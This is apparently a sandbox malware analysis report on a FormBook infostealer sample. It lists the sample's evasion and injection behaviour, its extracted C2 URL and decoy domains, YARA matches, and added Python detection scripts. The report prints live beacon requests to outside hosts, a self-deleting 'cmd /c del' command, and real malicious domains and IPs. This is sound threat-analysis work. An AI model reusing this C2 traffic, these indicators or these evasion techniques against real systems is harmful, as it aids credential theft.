

Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name: Nuevo Pedido.exe
Analysis ID: 528617
MD5: 159c46c59cd8ecb7a2bce707de1bc370
SHA1: e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256: 7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
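The tree above is the whole infection chain as endpoint telemetry would see it: the dropper starts a second copy of itself (the suspended child that gets hollowed), the payload migrates into the already-running explorer.exe, the injected shell launches a 32-bit cscript.exe with no script argument, and that script host runs cmd.exe to delete the original file. The following Python is an added example, not part of the Joe Sandbox report: it runs three heuristics over process-creation events built from the PIDs, image paths and command lines printed in the tree. The parent PID of the first Nuevo Pedido.exe and of explorer.exe, the cmd.exe image path and the benign notepad.exe control event are assumptions, not values from the report.

```python
"""Heuristics over process-creation events for the chain in the process tree:
self-spawn (hollowing candidate), injected explorer.exe launching a WOW64
script host, and cmd.exe deleting the original dropper.

Added example, not part of the Joe Sandbox report. Event records are built
from the PIDs, image paths and command lines printed in the tree; the parent
PIDs of the first Nuevo Pedido.exe and of explorer.exe, the cmd.exe image
path and the benign notepad.exe event are assumed (constructed)."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
SCRIPT_EXT_RE = re.compile(r"\.(?:vbs|vbe|js|jse|wsf|wsh|hta)\b", re.I)
# '/c del [/switches] "<path>"' in a cmd.exe command line; path captured raw.
DEL_RE = re.compile(r'(?:^|[\s&])del(?:\s+/\w+)*\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str    # as logged; Joe Sandbox omits argv[0] for cmd.exe


# Constructed from the report's process tree (assumptions noted above).
EVENTS = [
    ProcEvent(6320, 1152, r"C:\Users\user\Desktop\Nuevo Pedido.exe",
              r'"C:\Users\user\Desktop\Nuevo Pedido.exe"'),
    ProcEvent(6464, 6320, r"C:\Users\user\Desktop\Nuevo Pedido.exe",
              r"C:\Users\user\Desktop\Nuevo Pedido.exe"),
    ProcEvent(3472, 1152, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(6536, 3472, r"C:\Windows\SysWOW64\cscript.exe",
              r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(6420, 6536, r"C:\Windows\SysWOW64\cmd.exe",
              r'/c del "C:\Users\user\Desktop\Nuevo Pedido.exe"'),
    ProcEvent(6668, 6420, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(7000, 3472, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control
]


def _norm(path: str) -> str:
    return path.strip().strip('"').lower()


def _base(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def find_self_spawns(events):
    """Child whose image equals its parent's: the first Nuevo Pedido.exe starts
    a copy of itself to hollow ('Creates a process in suspended mode',
    'Sample uses process hollowing technique')."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if e.ppid in by_pid and _norm(by_pid[e.ppid].image) == _norm(e.image)]


def find_explorer_script_hosts(events):
    """explorer.exe launching a 32-bit script host with no script on the
    command line. The shell does not do that on its own; code injected into
    it does ('Maps a DLL or memory area into another process')."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or _base(parent.image) != "explorer.exe":
            continue
        if _base(e.image) not in SCRIPT_HOSTS or "\\syswow64\\" not in _norm(e.image):
            continue
        args = _norm(e.cmdline).replace(_norm(e.image), "", 1)
        if not SCRIPT_EXT_RE.search(args):
            hits.append(e.pid)
    return hits


def find_self_deletions(events):
    """cmd.exe 'del' whose target is the image of a process already seen in the
    same event stream ('Self deletion via cmd delete')."""
    known_images = {_norm(e.image) for e in events}
    hits = []
    for e in events:
        if _base(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if m and _norm(m.group(1)) in known_images:
            hits.append((e.pid, m.group(1)))
    return hits


def triage(events):
    return {
        "self_spawn": find_self_spawns(events),
        "explorer_script_host": find_explorer_script_hosts(events),
        "self_delete": find_self_deletions(events),
    }


if __name__ == "__main__":
    for rule, hits in triage(EVENTS).items():
        print(f"{rule:22s} {hits}")
```

The self-spawn heuristic alone is noisy (browsers, updaters and some installers start copies of themselves), so in production it belongs behind an allow-list or combined with the other two; the explorer.exe-to-SysWOW64-script-host and delete-a-known-image rules are far more specific and fire on exactly the two later steps of this tree.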

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(34 memory-dump entries in total; the remaining entries are not reproduced here)

      Unpacked PEs

Source | Rule | Description | Author
3.0.Nuevo Pedido.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dec:$sqlite3step: 68 34 1C 7B E1
  • 0x15d08:$sqlite3text: 68 38 2A 90 C5
  • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
3.0.Nuevo Pedido.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(18 unpacked-PE entries in total; the remaining entries are not reproduced here)

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview


            AV Detection:

Found malware configuration
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
Multi AV Scanner detection for submitted file
Source: Nuevo Pedido.exe, Virustotal: Detection: 32%
Source: Nuevo Pedido.exe, ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Nuevo Pedido.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Nuevo Pedido.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop edi, 3_2_00415660
Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop esi, 3_2_004157D8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe, Code function: 4x nop then pop esi, 3_2_004157AA
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop edi, 16_2_00615660
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop esi, 16_2_006157D8
Source: C:\Windows\SysWOW64\cscript.exe, Code function: 4x nop then pop esi, 16_2_006157AA

            Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.rcepjobs.com
Source: C:\Windows\explorer.exe, Domain query: www.sosibibyslot.website
Source: C:\Windows\explorer.exe, Network Connect: 185.53.179.91:80
Source: C:\Windows\explorer.exe, Domain query: www.tremblock.com
Source: C:\Windows\explorer.exe, Domain query: www.securebankofamericalog.site
Source: C:\Windows\explorer.exe, Domain query: www.thejohnmatt.com
Source: C:\Windows\explorer.exe, Network Connect: 3.64.163.50:80
Source: C:\Windows\explorer.exe, Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe, Domain query: www.onlinedatingthaiweb.com
Source: C:\Windows\explorer.exe, Network Connect: 192.232.250.147:80
Source: C:\Windows\explorer.exe, Network Connect: 185.53.178.53:80
Source: C:\Windows\explorer.exe, Domain query: www.downingmunroe.online
Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.163:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.spoiledzone.com/udeh/
Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.tremblock.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.rcepjobs.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.downingmunroe.online; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.thejohnmatt.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: global traffic, HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1; Host: www.onlinedatingthaiweb.com; Connection: close; Data Raw: 00 00 00 00 00 00 00 (Data Ascii: nothing printable)
Source: Joe Sandbox View, IP Address: 3.64.163.50
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Thu, 25 Nov 2021 14:10:30 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Thu, 25 Nov 2021 14:11:10 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp, String found in binary or memory: http://www.rcepjobs.com
Source: unknown, DNS traffic detected: queries for: www.tremblock.com
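Two things in the configuration and traffic above matter for triage: the extractor found exactly one C2 URL (www.spoiledzone.com/udeh/) next to 64 decoy domains, and every GET the sandbox captured went to a decoy while reusing the C2 path /udeh/, carrying the same second query parameter, and sending no User-Agent. A contacted-host list therefore says little on its own about where stolen data would go; the hosts have to be checked against the config. The script below is an added example, not Joe Sandbox's or FormBook's code: it parses the extractor's JSON and the five captured requests and labels each host. CONFIG_JSON is a trimmed copy of the report's config (the decoy list is cut to nine entries), the requests are the report's five GET lines re-joined with CRLFs as they sit on the wire, and the www.example.invalid request is constructed to show the "unknown" case.

```python
"""Label the hosts a FormBook sample contacts using its extracted config.

The config carries one real C2 URL plus a decoy list; the bot beacons to decoys
as well as the real server, so a contacted-host list alone does not show where
stolen data would go. Added example, not Joe Sandbox's or FormBook's code.
CONFIG_JSON is a trimmed copy of the report's config (64 decoys cut to 9);
REQUESTS are the five GETs printed in the report, re-joined with CRLFs;
UNKNOWN_REQ is constructed."""
import json
from urllib.parse import urlsplit

CONFIG_JSON = """{"C2 list": ["www.spoiledzone.com/udeh/"],
 "decoy": ["pimpyoursmile.com", "blueprintroslyn.com", "onlinedatingthaiweb.com",
           "thejohnmatt.com", "securebankofamericalog.site", "downingmunroe.online",
           "sosibibyslot.website", "rcepjobs.com", "tremblock.com"]}"""


def _req(target, host):
    return f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"


REQUESTS = [
    _req("/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN", "www.tremblock.com"),
    _req("/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN", "www.rcepjobs.com"),
    _req("/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN", "www.downingmunroe.online"),
    _req("/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN", "www.thejohnmatt.com"),
    _req("/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN", "www.onlinedatingthaiweb.com"),
]
UNKNOWN_REQ = _req("/udeh/?2dYxhfjx=AAAA&s6AD=5jltOBY8-rN", "www.example.invalid")  # constructed


def strip_www(host):
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def load_config(text):
    """Return ({c2_host: c2_path}, {decoy hosts}) from the extractor's JSON."""
    cfg = json.loads(text)
    c2 = {}
    for entry in cfg["C2 list"]:
        parts = urlsplit("http://" + entry)   # entries carry no scheme
        c2[strip_www(parts.hostname)] = parts.path or "/"
    return c2, {strip_www(d) for d in cfg["decoy"]}


def parse_beacon(raw):
    """Minimal HTTP/1.1 request parser. Query values are kept raw: '+' and '/'
    are part of the encoded blob, so parse_qsl's unquote_plus would corrupt it."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = [tuple((kv.split("=", 1) + [""])[:2]) for kv in parts.query.split("&") if kv]
    return {"method": method, "host": headers.get("host", ""), "path": parts.path,
            "params": params, "user_agent": headers.get("user-agent")}


def classify(c2, decoys, beacons):
    """host -> label plus two traits the report flags: the C2 path reused on
    decoy requests, and the missing User-Agent header."""
    out = {}
    for b in beacons:
        h = strip_www(b["host"])
        label = "c2" if h in c2 else "decoy" if h in decoys else "unknown"
        out[b["host"]] = {"label": label,
                          "c2_path_reused": b["path"] in c2.values(),
                          "no_user_agent": b["user_agent"] is None}
    return out


def shared_second_param(beacons):
    """The second query parameter is identical on every beacon in the report;
    return it as a pivot value when that holds, else None."""
    seen = {b["params"][1] for b in beacons if len(b["params"]) > 1}
    return seen.pop() if len(seen) == 1 else None


if __name__ == "__main__":
    c2, decoys = load_config(CONFIG_JSON)
    beacons = [parse_beacon(r) for r in REQUESTS + [UNKNOWN_REQ]]
    for host, info in classify(c2, decoys, beacons).items():
        print(f"{host:30s} {info}")
    print("shared second parameter:", shared_second_param(beacons))
```

Run against the full 64-entry list from the report, this labels all five contacted hosts as decoys and leaves www.spoiledzone.com, the only host worth blocking as C2, unobserved in this run; the two 403 responses above came from decoys and say nothing about the real server. The constant second parameter and the bare, User-Agent-less GET to "/<c2 path>/?<name>=<blob>&<name>=<id>" are the traits to pivot on in proxy logs, independent of which decoy was hit.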

            E-Banking Fraud:

Yara detected FormBook
Source: Yara match, same 19 unpacked-PE and memory-dump file sources as listed under AV Detection above

            System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
